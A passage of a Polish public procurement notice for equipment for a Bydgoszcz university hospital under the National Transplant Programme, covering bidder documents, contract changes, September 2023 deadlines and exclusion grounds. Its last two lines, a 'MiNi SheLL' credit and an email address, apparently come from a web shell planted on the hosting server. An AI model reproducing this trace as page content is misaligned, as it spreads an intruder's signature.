ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w SWZ Rozdział III pkt. 2 ppkt. 2.1 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument/dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>2.2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w SWZ Rozdział III pkt. 3 pkt.3.1. zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, że wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Terminy określone w SWZ Rozdział III pkt. 3 ppkt.3.1 stosuje się. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają możliwość zmiany umowy:<br/>1)	w przypadku wystąpienia okoliczności wskazanych w ustawie prawo zamówień publicznych, w szczególności w art. 455 ustawy prawo zamówień publicznych (dalej także „ustawy pzp”) za zasadach wskazanych w tej ustawie;<br/>2)	w zakresie obniżenia ceny w przypadku zaistnienia okoliczności mających wpływ na (uzasadniających) obniżenie ceny,<br/>3)	w zakresie wydłużenia okresu gwarancji i/lub rękojmi w przypadku zaistnienia okoliczności mających wpływ na (uzasadniających) wydłużenie okresu gwarancji,<br/>4)	w zakresie zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z przyczyn leżących po stronie Zamawiającego, których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć,<br/>5)	w zakresie wymiany przedmiotu umowy w ramach rękojmi lub gwarancji na inny o parametrach nie gorszych niż określone w formularzu oferty, jeżeli nie jest możliwe zastąpienie przedmiotu umowy takim samym przedmiotem np.: wskutek wprowadzenia do obrotu innego przedmiotu umowy w miejsce pierwotnie dostarczonego przedmiotu lub jeżeli zajdą inne uzasadnione okoliczności, jak np.: wprowadzenie do obrotu innego ulepszonego produktu w stosunku do produktu będącego przedmiotem umowy,<br/>6)	w zakresie zmiany terminu płatności w przypadku nieterminowego przekazania środków przez instytucję przyznającą dofinansowanie na realizację niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi załącznikami, oświadczeniami i dokumentami, należy złożyć elektroniczne za pośrednictwem Platformy Zakupowej Szpitala Uniwersyteckiego nr 2 im dr. Jana Biziela w Bydgoszczy, na stronie internetowej prowadzonego postępowania, znajdującej się pod adresem https://platformazakupowa.pl/pn/biziel_umk/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-06 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy Wykonawców na podstawie:<br/>- art. 108 ust. 1 ustawy Prawo zamówień publicznych,<br/>- art. 7 ust. 1, ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego(Dz. U. poz. 835).<br/>2. Zamawiający dodatkowo wykluczy Wykonawcę na podstawie art. 109 ust. 1 pkt. 4 ustawy Prawo zamówień publicznych.<br/>3. Szczegóły dotyczące podstaw wykluczenia, o których mowa powyżej określone zostały w SWZ - Rozdział XX -<br/>mieszczącej się na stronie internetowej pod adresem: https://platformazakupowa.pl/pn/biziel_umk/proceedings<br/>4. Informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji co, do<br/>których Wykonawca zastrzega, że nie mogą być udostępniane innym uczestnikom postępowania, muszą być oznaczone<br/>wyraźną klauzulą: np.; „Tajemnica przedsiębiorstwa”. Jeżeli wykonawca, nie później niż w terminie składania ofert, w<br/>sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa. Zamawiający nie<br/>odpowiada za ujawnienie informacji stanowiących tajemnicę przedsiębiorstwa przekazanych mu przez Wykonawcę wbrew<br/>postanowieniom niniejszych uregulowań.<br/>5, Zamówienie stanowi realizację zadania: „zakup sprzętu i aparatury” w ramach Narodowego Programu Transplantacyjnego poprzez zakup sprzętu i aparatury dla oddziałów anestezjologii i intensywnej terapii z największą aktywnością donacyjną w 2022 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com